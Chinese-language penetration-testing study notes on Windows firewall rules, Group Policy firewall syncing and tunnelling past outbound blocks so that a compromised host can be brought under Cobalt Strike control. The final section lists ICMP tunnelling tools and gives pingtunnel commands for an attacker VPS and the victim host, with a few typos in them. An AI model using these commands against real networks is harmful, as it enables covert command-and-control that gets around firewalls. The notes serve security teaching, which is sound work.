内网安全【2】——域防火墙/入站出站规则/不出网隧道上线/组策略对象同步

-隧道技术：解决不出网协议上线的问题(利用出网协议进行封装出网)（网络里面有网络防护，防火墙设置让你不能正常访问网络 但有些又能正常访问，利用不同的协议tcp udp 以及连接的方向：正向、反向）

-代理技术：解决网络通讯不通的问题(利用跳板机建立节点后续操作)  （网络设置导致的网络不通 一个A学校  一个B学校  压根不在一个网络 硬性条件决定网络不通）

跳板机可能是真实的服务器，也有可能是一个肉机。作为中间人和两边通信。

判断是代理还是隧道最大的区别就是中间的节点

#系列点:
1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如问使用隧道技术封装协议上线（上线cs）
6、判断哪些代理或隧道情况选择放弃（有些网络环境没办法没有能联网的）

演示案例:
单机-防火墙-限制端口出入站

单机-防火墙-限制协议出入站

域控-防火墙-组策略对象同步

域控-防火墙-组策略不出网上线

1、单机-防火墙-限制端口出入站

熟悉常见主机配置不出网的方式
1）、入站&出站&连接安全

2）、域&专用&公网&状态

3）、阻止&允许&其他配置

1）入站出站规则

防火墙大多是对入规则严格、出规则稍许放松

入站（相对于这台主机而言，进来的网络是入站）

出站（相对于这台主机而言，出去的网络是出站）

以自身的防火墙为参考  以下答案（入站规则）

以下答案（两个都可能）

原因：木马有正向连接、反向连接

正向就是入规则、反向就是出规则

正向反向木马连接

2）域、专用、公网

域环境下：以域配置下的防火墙为准

专用：指单独自己这台机器的防火墙配置

公用：指和其他机器有数据通信、是统一防火墙

3）阻止&允许&其他配置

案例演示

单机-防火墙-限制协议出入站

熟悉常见主机配置不出网的方式
1、程序&端口&预定义&自定义
2、协议

#域控-防火墙-组策略对象同步

熟悉常见主机配置不出网的操作流程

操作:组策略管理-域-创建GPO链接-防火墙设置

更新策略:强制:命令:重启
命令:gpupdate/force

#域控-防火墙-组策略不出网上线
背景介绍:域控通过组策略设置防火墙规则同步后，域内用户主机被限制c:出网，其中规则为出站规则，安全研究者通过入站取得sHEL权限，需要对其进行上线控制。思路:正向连接s隧道技术

如果是入站被限制呢?反向连接:隧道技术也可以解决(前提看限制的多不多)ICME协议项目:
httpe://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
1、cs-ICMP-上线
VPS :
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel,exe type client 1 127.0.0.1:6666-8 192.168.46.66 -192.168.46.66:7777 -tcp 1 -noprint 1 -noleg 1